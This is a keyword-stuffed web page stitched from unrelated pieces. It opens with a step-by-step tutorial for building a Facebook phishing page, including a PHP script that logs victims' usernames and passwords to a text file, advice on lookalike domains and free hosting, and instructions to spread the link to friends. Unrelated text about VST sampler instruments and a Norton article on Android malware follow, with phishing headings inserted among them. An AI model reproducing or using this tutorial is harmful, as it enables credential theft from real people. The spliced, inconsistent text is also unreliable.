How To Do Phishing Using Android

Ever heard about Phishing page and Phishing Attack? Today I’m going to show you how to create a Phishing page & How to do Phishing Attack step by step full tutorial. So, do you know

  1. How To Do Phishing Using Android Browser
  2. How To Stop Phishing Emails
  3. How To Create Phishing Link
  4. How To Do Phishing Attack
  5. How To Identify Phishing Email
  6. How To Make A Phishing Page

The user/victim will get navigated to a Phishing page that pretends to be legit. Common people who don’t find that phishing page suspicious are induced to enter their sensitive information and all the information would get sent to the hacker/attacker. Phishing Example Let us take Facebook as an example. Phishing is the attempt to get the personal information such as username, password etc by using a fake page! They send out e-mails that appears to come from the legitimate websites such as e-bay,Paypal etc and when you click those links they ask you to enter your details such as password, e-mail, Credit card number and once you enter your. If you’ve ever wondered how to hack an Android phone by sending a link – phishing is the answer. So, how does phishing work? Phishing is one of the most popular ways to hack a phone because it doesn’t require any physical access. The target is contacted via email or SMS. And start following the steps from step 7. After uploading the files all you have to do is start spreading your link to your friends and whenever they will click on the link they will be redirected to and whenever they will enter the username and password you will also get the username and password of your friend.This finishes the Tutorial of making Phishing page for Gmail!! SMS-based provisioning messages enable advanced phishing on Android phones Attackers can use this vulnerability to send highly credible phishing messages. Victims' internet traffic is then routed.

Table Of Content

How To Do Phishing Using Android
  • 1 What is Phishing Page?
    • 1.3 How to make a php script?

This Tutorial is for Education Purpose only!!!

Phishing is a technique by which we create a similar web page(Phishing Page) to the original one. In this technique, we copy original website page code and do some changes to it. Then upload it to the hosting and access it from anywhere.

Here is the list of things that you will learn from this post

  • How to copy the code from the original website
  • How to do some changes in this code
  • How to make a php script
  • How to upload it to the Hosting
  • and a lot more !!!

Umm!!! Interested to read further ?? I’m sure you will like this tutorial and you want this tutorial. 😛

DON’T MISS:- Hack Tutorial Step by Step Explanation

How to copy the code from the original website

Open a website of which Phishing page do you want then press ctrl+U to open its source code file. For ex:- I’m copying the code of and then I will make a facebook phishing page. Well, this is what which you want …Right!! 😛

So I’m copying the source code from by pressing ctrl+U. You can see here the source code from is shown here.

The only thing you have to do is to select all code and then copy this code by pressing ctrl+A and then ctrl+C and then open a notepad file and paste it there by pressing ctrl+V.

How To Do Phishing Using Android

You can see here I pasted down the whole code from website to my notepad file.

How to do some changes in this code?

Now, you have to find this line by pressing ctrl+F and type this whole line there and press Enter.

action=”″ method=”post”

Let’s do some changes, You can see the path of Facebook is shown here. Copy this whole path and replace it with login.php and also change the method from post to get. and save this notepad file with the name fb.html.

How to make a php script?

Do you know Php Language? Well, If you don’t know anything about Php Language then no problem but in the future, I recommend you to learn this language. So, I’m giving you a PHP code which will save the username password which is entered on our fb.html page. and it also saves different username and password to a new line. When the victim enters his username and password to it then this PHP script will redirect that user to the original Facebook page.

So, here’s the Php script

$handle = fopen(“logs.txt”, “a”);
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);

How To Do Phishing Using Android Browser

fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
fwrite($handle, “rn”);

Just copy this script and paste it down to your notepad file and then save this file with a name hack.php

One more thing creates a blank notepad file with a logs.txt name on which victim’s usernames and password will save.

Now, you have three notepad files one is none.html and second is login.php and third is logs.txt. Just copy all files and save it to a new folder.

How to upload Facebook Phishing Page to the Hosting?

Let Understand what is Hosting and Domain. To open a website we must have a domain, hosting. So, Domain is the name of our website. For ex :- I have This is my domain. and the location where this domain has parked this location is known as hosting.

Still Confused!! Let’s Understand with an Example, Whenever we open a new store then we have to decide two things

All samples are unlooped, and have a minimum duration of about 10 sec. The Strings engine is structured according to an adaptive model, based on the performance 'fingerprints' of the real instruments. The purpose of the model is to minimize the differences between the real phrases and those played by the virtual instruments. Samplemodeling Ultra realistic Kontakt based Virtual Instruments for musicians, composers and producers. Grace Sampler by One Small Clue. The Grace Sampler is simple, sleek, and suited to synth users. Best Modeled Software Instruments VST Plugins Are you looking for the most amazing playability, ease of use and expressive performance for your software instruments? Software instruments purely based on 1000s of recorded samples of notes, articulations, dynamics etc. Have been around for a long time. Employs an entirely new technology, developed by Stefano Lucato when it became clear that all the previously applied approaches simply could not do.The technical name is Synchronous Wave Triggering.It uses samples as a base material, chromatically performed by a professional sax player over a very wide dynamic range, and recorded with state-of-the-art technology. Sample modeling vst plugins.

  • Store’s Name
  • Land/room

How To Stop Phishing Emails

Similarly, For opening a website we need Domain for a website which is unique. and the second one is the land which is hosting on the Internet. Hosting and Domain are paid and some websites also provide this hosting and domain at free of cost.

Here’s the list of Free hosting providers website.

  • and many more…

I’m using 000webhost here. So, open this website and do sign up there. In the field of a website, name leaves it blank.

and now you have to take a domain which looks similar to Facebook. If you don’t know about creating a similar word the same as the original one. Check my earlier post.

I’m sharing some website link which provides free domains.

You can use any of them to register a domain for free. Now, come to the hosting. You can use any of the websites. Now, the post is becoming so long so, at 29 April I will upload Its second part in which I will show you how to attach domain and hosting and also tell some tricks which nobody tells you. 🙂 So, do subscribe to the new post. Good Bye 🙂

This is the Second Part:- How to Upload a Phishing page on Hosting Phishing Page Part 2

July 24, 2020

Save up to $65 on Norton 360 for first year*

Get multiple layers of protection for your Cyber Safety. Don't wait!

Does my Android phone have a virus? Is it infected with malware or a malicious app? Will my personal information be held for ransom? If you find yourself asking these questions, then here is some useful information about Android devices and antivirus apps that may help you.

Viruses and other types of malware

Malware is malicious software that can sneak onto your phone. Written with the intent to cause harm, malware can include viruses, computer worms, Trojans, ransomware, and spyware.

Cybercriminals can use malware to access your personal data and, in some cases, subsequently use that sensitive information to commit identity theft or fraud.

Viruses are a particular type of malware that infiltrate a computer or other device and their programs. A cybercriminal may be able to install a virus on your device without your knowledge or consent. The virus may then be able to insert new, malicious code on your device that can monitor and manipulate your online activity.

What can viruses and other malware do to Android phones?

Malware is designed to generate revenue for cybercriminals.

Malware can steal your information, make your device send SMS messages to premium rate text services, or install adware that forces you to view web pages or download apps.

Info stealers can steal your contact list, your personal information, your location, your passwords, and more.

With the aid of malware, cybercriminals can access your devices and steal your information for their own use or to sell on the dark web.

Hackers also use ransomware to lock devices and encrypt personal data. Then they can demand a ransom payment from the victim in order to regain access to their files.

Signs your Android phone may have a virus or other malware

Phones can be vulnerable to damage externally and internally. While the external damage is usually visible, internal damage is usually hidden from view.

Malware like viruses are known to perform repeated tasks that can take up resources on your devices. Signs of malware may show up in these ways.

  1. Your phone is too slow.
  2. Apps take longer to load.
  3. The battery drains faster than expected.
  4. There is an abundance of pop-up ads.
  5. Your phone has apps you don’t remember downloading.
  6. Unexplained data usage occurs.
  7. Higher phone bills arrive.

How to check for viruses and other malware on your Android phone

A good way to check for malware on your Android phone is to run an antivirus scan.

Before buying antivirus software for your phone, make sure you consider the most comprehensive product that’s available for your device.

There are many antivirus software choices available on the market. Some are free, and some are sold.

It’s a good idea to do your research to ensure the security software you invest in runs a complete scan and doesn’t overlook any vulnerabilities. An incomplete scan could give you a false sense of security when, in fact, your device could be vulnerable to cyberattacks.

Norton Mobile Security for Android is one product you might consider.

How to remove viruses and other malware from your Android device

If you think you have malware on your phone, it’s important to stop the malware from causing any further damage. Here are a few steps you can take.

  1. Power off the phone and reboot in safe mode. Press the power button to access the Power Off options. Most Android phones come with the option to restart in Safe Mode. Here’s how, according to Google, although Safe Mode can vary by phone: Press your phone's power button. When the animation starts, press and hold your phone's volume down button. Hold it until the animation ends and your phone restarts. You'll see “Safe mode” at the bottom of your screen.
  2. Uninstall the suspicious app. Find the app in Settings and uninstall or force close it. This may not completely remove the malware, but it could prevent further damage to your device, or from it transmitting the malware to other devices on your network.
  3. Look for other apps you think may be infected. There’s a chance that some apps may have been infected by the malware. If you think you can identify those apps, delete them immediately.
  4. Install a robust mobile security app on your phone.

Tips to help protect your Android device against viruses and other malware

Here are seven key steps you can take to help protect against future risks.

How to make a phishing page

How To Do Phishing Attack

  1. Invest in and use robust security software to protect your Android device.
  2. Keep all operating systems and software updated with the latest versions.
  3. Don’t click on suspicious or unfamiliar links in emails and text messages.
  4. Use strong, complicated passwords or a password manager.
  5. Never use unsecure Wi-Fi connections. Always use a VPN when connecting to public Wi-Fi.
  6. Always use strong cyber safety protection on all devices that connect to the internet.
  7. Always install apps from trusted sources, such as the Google Play Store. Read the fine print and permissions on the apps to understand how much access you are giving the app developers.

How To Identify Phishing Email

It’s a good idea to not wait until your device gets infected. Make protecting your Android device a priority. Having good antivirus software that helps protect your PCs, tablets, and other Android devices could help prevent malware from spreading from device to device.

Save up to $65 on Norton 360 for first year*

How To Make A Phishing Page

Get multiple layers of protection for your Cyber Safety. Don't wait!

Editorial note: Our articles provide educational information for you. NortonLifeLock offerings may not cover or protect against every type of crime, fraud, or threat we write about. Our goal is to increase awareness about cyber safety. Please review complete Terms during enrollment or setup. Remember that no one can prevent all identity theft or cybercrime, and that LifeLock does not monitor all transactions at all businesses.

Copyright © 2020 NortonLifeLock Inc. All rights reserved. NortonLifeLock, the NortonLifeLock Logo, the Checkmark Logo, Norton, LifeLock, and the LockMan Logo are trademarks or registered trademarks of NortonLifeLock Inc. or its affiliates in the United States and other countries. Firefox is a trademark of Mozilla Foundation. Android, Google Chrome, Google Play and the Google Play logo are trademarks of Google, LLC. Mac, iPhone, iPad, Apple and the Apple logo are trademarks of Apple Inc., registered in the U.S. and other countries. App Store is a service mark of Apple Inc. Alexa and all related logos are trademarks of, Inc. or its affiliates. Microsoft and the Window logo are trademarks of Microsoft Corporation in the U.S. and other countries. The Android robot is reproduced or modified from work created and shared by Google and used according to terms described in the Creative Commons 3.0 Attribution License. Other names may be trademarks of their respective owners.